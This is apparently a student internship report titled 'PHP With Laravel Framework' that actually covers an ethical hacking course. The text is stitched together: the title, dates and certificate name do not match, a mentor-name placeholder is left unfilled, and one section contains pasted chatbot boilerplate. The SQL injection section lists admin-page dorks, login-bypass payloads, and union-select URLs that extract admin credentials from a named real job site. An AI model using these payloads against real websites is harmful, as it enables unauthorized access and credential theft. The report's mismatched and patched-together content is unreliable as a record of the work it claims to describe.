Dept.

of Computer Science & Engineering

Course Code: CSE 4389
Course Title: Industrial Training (Field Work)

Internship Report
On
PHP With Laravel Framework

Submitted By
Tahmidul Jawad
ID - 41200101486

Submitted To
Muhammed Samsuddoha Alam
Associate Professor and Co-ordinator
Department of CSE

Date of Submission – 20 January 2024

 LETTER OF TRANSMITTAL

03/ 06/ 2023

Muhammed Samsuddoha Alam

Associate Professor and Co-ordinator
Department of Computer Science and Engineering
Northern UniversityBangladesh, Dhaka-1230

Subject: Submission of Internship report.

Dear Sir,
I am pleased to submit the enclosed report titled " PHP With Laravel Framework” in
accordance with our discussion on the importance of understanding the evolving
cybersecurity landscape. This report aims to provide an in-depth analysis of the current
cybersecurity threat landscape and offers insights into the emerging trends, potential
risks, and effective mitigation strategies that organizations should consider. It presents
a comprehensive overview of the key threats impacting businesses and individuals in
today's digital landscape.

I also want to thank you for your support and patience with me and I appreciate the
opportunity provided by you by assigning me to work on this thoughtful Company. I,
therefore pray request, and hope that you would be kind enough to me by providing
acceptance of this report and oblige thereby.

Yours sincerely,

Tahmidul Jawad
ID: 41200101486
Program: CSE (Day)
Northern University Bangladesh

2
 APPROVAL

The Industrial Training Report on “PHP With Laravel Framework” submitted

by, Tahmidul Jawad, ID: 41200101486 to the Department of Computer Science &
Engineering has been accepted as satisfactory for the Course CSE-4389 titled
‘Filed work (Industrial Training)’.

Board of Examiners:

1. Muhammed Samsuddoha Alam (Supervisor)

2. Md. Ruhul Amin (Examiner)

Md. Raihan-ul-Masood
Associate Professor & Head
Department of Computer Science & Engineering
Northern University Bangladesh, Dhaka-1230

3
 STUDENT’S DECLARATION

I am Tahmidul Jawad student of Computer Science & Engineering (CSE), ID No:

41200101486, Program: CSE(day) from Northern University Bangladesh, declares that this
Internship Report on “PHP With Laravel Framework” is my work.

References are provided, as it is free from plagiarism.

Tahmidul Jawad
ID: CSE 41200101486
Northern University Bangladesh

4
 Certificate of Supervisor

This is to certify that Tahmidul Jawad, Program: CSE, Id: 41200101486 ,

Northern University Bangladesh has completed the Internship Report titled
“ PHP With Laravel Framework” under my supervision.

I am pleased to state that Tahmidul Jawad worked hard in preparing this report
and he has been able to present a good picture of the concerned organization.

I wish her every success in life.

__________________________
Muhammed Samsuddoha Alam
Associate Professor and Co-ordinator
Department of Computer science and engineering
Northern University Bangladesh, Dhaka 1230

5
 ACKNOWLEDGEMENTS

I would like to express my sincere gratitude to all the individuals and the entire
team at Arena Web Security for their invaluable support and guidance
throughout my internship on the topic of "Cyber Security and Ethical Hacking."
Their expertise, mentorship, and dedication have played a crucial role in shaping
my learning experience and professional growth.

First and foremost, I would like to extend my deepest appreciation to

[Supervisor/Mentor's Name], my internship supervisor at Arena Web Security.
Their extensive knowledge, experience, and unwavering support have been
instrumental in providing me with the necessary guidance and direction
throughout this internship. Their mentorship has not only enhanced my technical
skills but also broadened my understanding of the ethical hacking and
cybersecurity domain. I worked in this company as a internee from 01/05/2021
to 07/06/2022. I extend my heartfelt thanks to all the individuals at Arena Web
Security who have contributed to my internship on "Cyber Security and Ethical
Hacking." Their support, guidance, and expertise have been instrumental in
shaping my skills and knowledge in this rapidly evolving field. I also picked up
considerable skills in handling team communication, training others, getting
trained, and the ability to adapt to the ever.

Thank you all for your invaluable contributions and for providing me with a
remarkable internship experience.

6
 Completion Certificate

CERTIFICATE
OF APPRECIATION
THIS CERTIFICATE IS AWARDED TO

MD ABU BATEN
In recognition of the successful completing of the Cyber Security

TANJIM AL FAHIM
CEO

17-06-2021 V-A31W21001S
Issued Verification No.

Training Objective:
Æ Importance of information Security in today’s world.
Æ Elements of security
Æ Various phase of the hacking cycle
Æ Types of hacker attacks
Æ Hacktivism
Æ Ethical hacking
Æ Vulnerability research and tools
Æ Steps for conducting ethical hacking
Æ Computer crimes and implications

7
 Table of Contents
Preliminary Pages

Letter of Transmittal Approval Students declaration Certificate of Supervisor

Acknowledgement Internship Completion Certificate

Table of Contents
Training Objective: ............................................................................................................. 7
Course Outline:- ................................................................................................................. 9
Introduction ..................................................................................................................... 10
1. What is Sql injection attack? ........................................................................................... 11
2. WAF Bypass .................................................................................................................... 14
2.1WAF Misconfiguration: ........................................................................................................................ 14
2.2Input Transformation Techniques: ........................................................................................................ 15
2.3 Protocol-Level Bypasses: ...................................................................................................................... 15
2.4 Timing Attacks: ..................................................................................................................................... 15
Example of the WAF Bypass:- ................................................................................................. 15
3. Dorking ............................................................................................................................ 16
4. Malware ........................................................................................................................... 17
4.1 Virus: .................................................................................................................................................... 17
4.2 Worm: .................................................................................................................................................. 17
4.3 Trojan: ................................................................................................................................................. 17
4.4 Keylogger: ............................................................................................................................................ 17
4.5 Spyware: ............................................................................................................................................... 17
5. Cross Site Scripting (XSS) ............................................................................................... 18
5.1 Stored XSS: ........................................................................................................................................... 18
5.2Reflected XSS: ...................................................................................................................................... 18
5.3 DOM-based XSS: .................................................................................................................................. 19

6. Burpsuite ......................................................................................................................... 19
7. Scanning .......................................................................................................................... 21
7.1 Nmap: .................................................................................................................................................... 21
7.2 FIN Scan: .............................................................................................................................................. 21
7.3 XMAS Scan: ......................................................................................................................................... 21
7.4 TCP Scan: .............................................................................................................................................. 22
7.5 UDP Scan: ............................................................................................................................................. 22
7.6 IDLE Scan: ............................................................................................................................................ 22
8. Penetration Testing .......................................................................................................... 22
8.1 What is penetration testing? ...................................................................................................... 22
8.2 Why conduct a penetration testing? .................................................................................................. 23
8.3 What can be tested? ............................................................................................................................ 23
8.4 What is a process of penetration testing? .................................................................................. 23
CONCLUSION ................................................................................................................ 24
Reason for choosing CEH ................................................................................................ 25

8
Course Outline:-
Total Credit 50
Æ Introduction to Ethical Hacking
Æ Foot printing
Æ Open-Source Intelligence (OSINT)
Æ Dorking
Æ Cryptography
Æ Denial-of-Service (DDOS)
Æ Trojans and Backdoors
Æ SQL Injection
Æ WAF Bypass
Æ Shell Scripting
Æ Keylogger, Spyware
Æ Hacking Wireless Networks
Æ Web Server Security, cPanel
Æ LFI/RFI/RCE (Paper)
Æ Cross Site Scripting (XSS)
Æ Social Engineering, Phishing, Social Media Recovery
Æ Linux (Kali Linux) Hacking Tools
Æ Burpsuite, Hacking Lab
Æ System Hacking, Authentication Bypass
Æ Portswigger lab problem solve
Æ NMAP, FIN scan, XMAS scan, TCP scan, UDP scan, IDLE scan
Æ Outsourcing in Hackerone and Bugcroud
Æ Bug Report
Æ Penetration Testing
Æ Thesis(paper writing)
Æ Internship(30 days)

9
 Introduction
This internship report provides an overview of my practical experience and learning
during my internship in the field of cybersecurity and ethical hacking. Throughout this
internship, I had the opportunity to delve into the fascinating world of cybersecurity,
gaining hands-on experience in various aspects of securing digital systems and
understanding the ethical principles underlying hacking techniques.

Cybersecurity has become a critical concern in today's digital age, with organizations
and individuals facing increasingly sophisticated threats from malicious actors. As a
result, there is a growing demand for skilled professionals who can protect against and
mitigate cyber risks. This internship aimed to provide me with practical exposure to
the challenges and techniques involved in securing computer networks, systems, and
data.The objectives of this internship report are to document the activities and projects
I undertook, highlight the skills I developed, and reflect on the ethical implications of
my work. It covers a wide range of topics, including vulnerability assessment,
penetration testing, incident response, and security best practices. Throughout my
internship, I had the privilege of working alongside experienced cybersecurity
professionals who guided me through real-world scenarios and provided valuable
mentorship. I actively participated in security assessments, analyzed vulnerabilities,
and recommended appropriate countermeasures to enhance the security posture of the
organizations I worked with.

Ethical hacking, an integral part of this internship, allowed me to explore the mindset
of an attacker and understand how vulnerabilities can be exploited. I learned about
various hacking techniques, such as reconnaissance, scanning, exploitation, and post-
exploitation, always adhering to the ethical guidelines and legal boundaries in
place.Moreover, this internship provided me with a deeper understanding of the
importance of proactive security measures, including continuous monitoring, threat
intelligence, and risk assessment. I gained exposure to industry-standard tools and
frameworks used for security testing and analysis, equipping me with the necessary
technical skills to identify and mitigate vulnerabilities.

Ultimately, this internship report serves as a stepping stone towards a career in

cybersecurity, allowing me to apply the knowledge and skills acquired to contribute
meaningfully to the ongoing efforts of safeguarding digital systems, combating cyber
threats, and ensuring the integrity and confidentiality of information.

10
 1. What is Sql injection attack?

A SOL Injection attack is a form of attack that comes from user input that has
not been checked to see that it is valid. The objective is to fool the database
system into running malicious code that will reveal sensitive information or
otherwise compromise the server.
SQL injection is a technique used to take advantage of non-validated input
vulnerabilities to pass SQL commands through a Web application for execution
by a backend database. Attackers take advantage of the fact that programmers
often chain together SQL commands with user-provided parameters, and can
therefore embed SOL commands inside these parameters. The result is that the
attacker can execute arbitrary SQL queries and/or commands on the backend
database server through the Web application.
MYSQL Injection
Dorks Code:
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurladmin/login.asp
inurl:admin/home.asp
inurladmin/login.asp
inurl:administrator login.asp
I am going to use:

Code:

http://site.com/Admin Login.asp

Logging

Now you can find some site over these dorks and try to log in with:

Username: Admin

Password: password' or 1=1--

Instead of password' or 1=1 you can use some of these:

Code:

'or'1'='1

‘ or ‘1'='1

11
‘ or 0=0 --

" or 0=0 –

or 0=0 =-

‘ or 0=0 #

" or 0=0 # or 0=0 #

' or '×'='x

" or "x"="×

" or 1=1--

" or 1=1—

or 1=1—

or a=a--

"or "a"="a

"or'1=1'

Password' or 1=1 will the confuse server and will let you log in.

So if you are able to log in, site is vulnerable and you are going to be able to
use admin panel.
Advance Sql Injection:

◦ http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98
union select1,2,group_concat(database0),4,5,6,7,8,9,10, 11, 12,13, 14, 15,
16, 17, 18, 19,20,21,22,23,24,25,26,27,28,29,30,31-
◦ http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98
union select1,2, group_concat(table _name),4,5,6,7,8,9, 10,11,12,13, 14,
15,16, 17,18, 19,20,21,22,23,24, 25,26,27,28,29,30,31 from information
schema.tables where table schema = database() -
◦ http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98
union select 1,2, group_concat(column_name), 4,5,6, 7,8,9,10,11, 12, 13,
14, 15, 16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31 from information
schema.columns where table name = 0x6e675£61646d696e__

12
 Æ http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98
union select 1,2,group_ concat(id, 0×3a, lo ginid, 0x3 a,
mail,0×3a,password,0x3a,name,0×3a,type,0×3a),
4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,
19,20,21,22,23,24,25,26,27,28,29,30,31 from ng admin—
Menual Sql Injection:-

tools used for Sql injection are:

Ø Havij
Ø Sql map
Havij Example:-

13
 2. WAF Bypass

Bypassing a Web Application Firewall (WAF) refers to circumventing or evading the

security measures implemented by a WAF to block or filter malicious traffic. Bypass
techniques exploit vulnerabilities in WAF configurations or weaknesses in the
detection mechanisms to allow unauthorized access or execute malicious actions. It's
important to note that discussing specific bypass techniques can promote unethical
behavior and is against OpenAI's use case policy. However, I can provide you with
general insights on how bypasses can occur.

2.1 WAF Misconfiguration:

WAFs are complex systems that require proper configuration to effectively protect
web applications. Misconfigurations such as allowing overly permissive rules, not
updating rule sets, or failing to handle edge cases properly can create opportunities for
bypassing the WAF. Attackers may exploit these misconfigurations to evade detection.

14
2.2 Input Transformation Techniques:
WAFs analyze and filter incoming requests based on predefined patterns or signatures.
Attackers can employ input transformation techniques to obfuscate malicious payloads
and evade detection. For example, encoding or encrypting malicious code can make it
difficult for the WAF to recognize and block the malicious intent.

2.3 Protocol-Level Bypasses:

Some WAFs may focus primarily on inspecting HTTP traffic, leaving other protocols or
encodings vulnerable. Attackers can attempt to bypass the WAF by leveraging protocols
such as WebSockets, FTP, or DNS that are not adequately inspected, or by using
unconventional encodings or encapsulation techniques to hide malicious payloads.

2.4 Timing Attacks:

WAFs often impose restrictions on the rate and frequency of requests to mitigate
certain types of attacks, such as brute force or DoS attacks. Attackers can exploit
timing-related vulnerabilities to bypass these rate-limiting measures by carefully
manipulating the timing and order of their requests.

It's important to highlight that bypassing a WAF is unethical and illegal without proper
authorization. WAFs play a crucial role in protecting web applications from various
attacks, and bypassing them can lead to serious security implications, data breaches,
and legal consequences. Responsible security practitioners should focus on
collaborating with system administrators and WAF providers to enhance the
effectiveness of these security measures.

Example of the WAF Bypass:-

15
 3. Dorking
In the context of computer security and hacking, dorking refers to a technique
where individuals use search engines, such as Google, to find vulnerable
websites and servers. The process involves using specific search queries or
"dorks" that are designed to reveal websites or web applications with known
vulnerabilities or misconfigurations.

By using dorks, attackers can identify websites that may have exposed sensitive
information, weak passwords, or outdated software versions that are susceptible
to exploitation. Dorking can be an initial step in the reconnaissance phase of a
cyber attack, providing hackers with potential targets for further exploitation.

It's important to note that dorking itself is not malicious; it is a method used by
both security researchers and malicious actors to find vulnerabilities. Ethical
hackers and cybersecurity professionals may employ dorking techniques to
discover and address vulnerabilities before they are exploited by malicious
attackers. However, unauthorized and malicious use of dorking techniques to
compromise systems or access sensitive information is illegal and a violation of
computer security laws.

Example:
inurl /bug bounty
inurl : / security
inurl:security.txt
inurl:security "reward"
inurl : /responsible disclosure
inurl : /responsible-disclosure/ reward
inurl : / responsible-disclosure/ swag
inurl : / responsible-disclosure/ bounty

16
 4. Malware
This is a big catchall phrase that covers all sorts of software with nasty intent.
Not buggy software, not programs you don't like, but software which is
specifically written with the intent to harm.
4.1 Virus:
This is a specific type of malware that spreads itself once it's initially run. It's
different from other types of malware because it can either be like a parasite that
attaches to good files on your machine, or it can be self-contained and search out
other machines to infect.

4.2 Worm:
Think of inchworms rather than tapeworms. These are not parasitic worms, but
the kind that move around on their own. In the malware sense, they're viruses
that are self-contained (they don't attach themselves like a parasite and go
around searching out other machines to infect.
4.3 Trojan:
Do you remember that story you had to read in high school about the big
wooden horse that turned out to be full of guys with spears? This is the computer
equivalent. You run a file that is supposed to be something fun or important, but
it turns out that it's neither fun nor important, and it's now doing nasty things to
your machine.

4.4 Keylogger:
A keylogger, also known as keystroke logger, is a type of software or hardware
that records every keystroke made on a computer or mobile device without the
user's knowledge or consent. It can capture sensitive information such as
passwords, credit card details, personal messages, and other confidential data.
Keyloggers can be designed to operate at the software level, intercepting
keystrokes before they reach the operating system, or at the hardware level,
capturing keystrokes through physical devices attached to the computer.

4.5 Spyware:
Spyware is a broader term that refers to any software that secretly gathers
information about a user or organization without their consent. It is typically
installed on a device without the user's knowledge, often bundled with legitimate
software or through malicious downloads. Spyware can monitor and collect

17
various types of information, such as browsing habits, online activities,
passwords, email addresses, and more. This information is then transmitted to a
remote server, where it can be accessed and exploited by malicious individuals
for various purposes, including identity theft, fraud, or targeted advertising.

Both keyloggers and spyware can pose significant privacy and security risks.
They can compromise personal and sensitive information, leading to financial
loss, identity theft, and other forms of cybercrime. Protecting against these
threats involves using robust antivirus and anti-malware software, keeping
software and operating systems up to date, being cautious while downloading
files or visiting suspicious websites, and regularly monitoring for any signs of
unauthorized activity on your devices.

5. Cross Site Scripting (XSS)

Cross-Site Scripting (XSS) is a type of web vulnerability that occurs when an
attacker injects malicious scripts into a trusted website, which are then executed
by unsuspecting users who visit the affected website. XSS attacks typically
target web applications that dynamically generate web pages and fail to properly
validate or sanitize user input.
There are three main types of XSS attacks:

5.1 Stored XSS:

In this type of attack, the malicious script is permanently stored on the target
server, often in a database or user-generated content. When a user visits a page
that displays the stored script, it is executed within their browser, potentially
leading to unauthorized actions or data theft.
5.2 Reflected XSS:
In a reflected XSS attack, the injected script is embedded in a URL or other
input, which is then reflected back to the user by the web application. When the
user clicks on the manipulated link or submits a form, the script is executed by
their browser. This type of attack often relies on social engineering techniques to
trick users into clicking on a malicious link.

18
 5.3 DOM-based XSS:
DOM (Document Object Model)-based XSS occurs when the client-side script
modifies the Document Object Model of a web page, leading to script execution.
Unlike stored and reflected XSS, DOM-based XSS does not require server-side
vulnerabilities. Instead, it exploits insecure JavaScript coding practices that
allow attacker-controlled data to be directly incorporated into the DOM.
The consequences of successful XSS attacks can vary depending on the attacker's
intentions, but they can include the theft of sensitive information, session hijacking,
defacement of websites, distribution of malware, or phishing attacks.

6. Burpsuite

Burp Suite is a popular and powerful set of tools used for web application
security testing and penetration testing. It is developed by PortSwigger, and it
provides a comprehensive platform for assessing the security of web
applications. Burp Suite consists of several modules that work together to assist
security professionals in various stages of the testing process.

19
The main features of Burp Suite include:

Intercepting Proxy:
Burp Suite acts as a proxy between the browser and the web application,
allowing users to intercept and modify the requests and responses. This feature
helps in analyzing and manipulating the data exchanged between the client and
the server, making it useful for identifying and exploiting vulnerabilities.

Spider:
The Spider tool automatically explores the target web application, crawling
through the different pages and identifying all the accessible functionality. It
helps in mapping out the application's structure and discovering hidden content
and functionality.

Scanner:

20
Burp Suite includes an automated vulnerability scanner that can identify
common web application security issues, such as cross-site scripting (XSS),
SQL injection, and more. The scanner performs various checks and tests against
the target application to identify potential vulnerabilities.

Intruder:
The Intruder tool is used for automated fuzzing and brute-forcing attacks. It
allows testers to define custom payloads and payloads lists to automate attacks
against different parts of the web application, such as parameters, headers, and
cookies. This feature helps in identifying vulnerabilities related to input
validation and security controls.

Repeater:
The Repeater tool allows testers to manually send modified requests to the target
web application and observe the responses. It helps in manually testing
vulnerabilities and verifying the impact of various input values.

7. Scanning

7.1 Nmap:
Nmap (Network Mapper) is a powerful and versatile open-source network
scanning tool used for network exploration, security auditing, and vulnerability
assessment. It provides a wide range of scanning techniques and features that
allow users to discover hosts, services, and potential vulnerabilities within a
network.

7.2 FIN Scan:

A FIN scan is a type of TCP scanning technique used by Nmap to determine the
open or closed state of TCP ports on a target system. It sends a TCP packet with
the FIN (Finish) flag set, which is normally used to gracefully close a TCP
connection. If a port responds with a TCP RST (Reset) packet, it indicates that
the port is closed. However, if no response is received, it suggests that the port is
open or filtered by a firewall.

7.3 XMAS Scan:

Similar to the FIN scan, an XMAS scan is another TCP scanning technique
employed by Nmap. It sends TCP packets with the URG (Urgent), PSH (Push),

21
and FIN flags set, resembling an "XMAS tree" with all the lights on. If a port
responds with a TCP RST packet, it is considered closed. The lack of response
may indicate that the port is open or filtered.

7.4 TCP Scan:

A TCP scan is a comprehensive scanning technique offered by Nmap, where it
attempts to establish a TCP connection with target ports to determine their state.
It sends TCP SYN (Synchronize) packets and analyzes the responses. If a port
responds with a SYN-ACK (Synchronize-Acknowledge) packet, it indicates that
the port is open. A TCP RST packet indicates that the port is closed, and no
response suggests that the port is filtered.

7.5 UDP Scan:

While TCP is a connection-oriented protocol, UDP (User Datagram Protocol) is
connectionless. Nmap's UDP scan technique is used to identify open UDP ports
on a target system. It sends UDP packets to specific ports and analyzes the
responses. If a port responds with an ICMP (Internet Control Message Protocol)
message, it indicates that the port is closed. A lack of response suggests that the
port is open or filtered.

7.6 IDLE Scan:

IDLE scan, also known as zombie scan, is a stealthy scanning technique offered
by Nmap. It leverages the IP ID sequence generation behavior of certain
operating systems to scan target systems indirectly through a third-party system,
referred to as a zombie. By sending crafted packets to the zombie and analyzing
the IP ID sequence, Nmap can determine whether a port is open, closed, or
filtered on the target system. This technique helps conceal the true source of the
scan, making it difficult to trace back to the initiator.

8. Penetration Testing
8.1 What is penetration testing?

A penetration testing is a method of evaluating the security of a computer system or a

network by simulating an attack from a malicious source, known as black hat hackers,
or crackers. The process involves an active analysis of the system from any potential
vulnerabilities that may result from poor or improper system configuration, known and
/or unknown hardware or software flaws, or operational weakness in process or
technical countermeasures.

22
 8.2 Why conduct a penetration testing?

From a business perspective, penetration testing helps safeguard your organization

against failure, through Preventing financial loss through fraud or through lost revenue
due to unreliable business system and processes. Proving due diligence and
compliance to your industry regulators, customers and shareholders. Protecting your
brand by avoiding loss of consumer confidence and business reputation.

8.3 What can be tested?

All part where organization captures, store and processes information can be assessed
like the system where the information is stored in, the transmission channels that
transport it, and the processes and personnel that manages it, Examples of areas that
are commonly tested are:

Ø Operating system, applications, database, networking equipments etc.

Ø Dynamic websites, in-house applications etc.
Ø Telephony (war-dialing, remote access etc.)
Ø Physical (access controls, dumpster diving etc.)
Ø Wireless (wifi, Bluetooth, IR, GSM, RFID etc.)

8.4 What is a process of penetration testing?

Penetration testing has a vulnerability assessment part also. In pen test we launch attack
and in VA (vulnerability assessment) we only test for vulnerability by automated VA tools
like Niko, nessus, acunetix etc. Steps of advanced penetration testing:

1. If we want to do pen test on any website like, www.anysite.com we need

DNS Records from robtex.com & whois records and other type of
information this part is known as Information Gathering.
2. After we use backtrack operating system (also known as pen-testing OS for
security experts) toolkit for auto pen-testing with help of free tools like:
Nikto, Privoxy, Nessus, Samurai etc.
3. Make report for all found vulnerabilities and cross verify.
4. Use commercial software's like: Core Impact, Canvas, Qualys Guard, Xcobra,
NTOSpider, KSES, AppScan, Webinspect, Brupsuite, Acunetix WVS etc.
5. Make report for new vulnerabilities.
6. After we will start manual pen-testing with help of Metasploit &Reverse eng
tools.
7. Find vulnerabilities and take screen shots for Proof-Of-Concept create
custom report.
8. Forward Custom Report to company.

23
CONCLUSION

My internship experience in the field of cybersecurity and ethical hacking has

been both enlightening and rewarding. Throughout the duration of my
internship, I had the opportunity to gain practical knowledge and hands-on
experience in various aspects of securing computer systems and networks, as
well as understanding the techniques used in ethical hacking. I was able to work
closely with experienced professionals in the field who guided me through real-
world scenarios and challenges. This allowed me to develop a comprehensive
understanding of the cybersecurity landscape and the importance of proactive
measures to protect organizations from potential threats.

I am grateful for the opportunity to contribute to the organization's cybersecurity

efforts during my internship and look forward to applying the knowledge and skills
I have acquired in my future endeavors. I believe that the experience gained during
this internship will serve as a solid foundation for pursuing a career in cybersecurity
and ethical hacking, where I can actively contribute to safeguarding digital systems
and protecting sensitive information from malicious actors.

24
Reason for choosing CEH
1. Companies started taking Information Security seriously.
2. Salary is good.
3. The field is diverse.
4. I will never be unemployed.
5. I have an opportunity to interact with everyone in the company.
6. I will set the rules (and also have the power to break them).
7. Being a security professional is cool... or at least people think it is.

25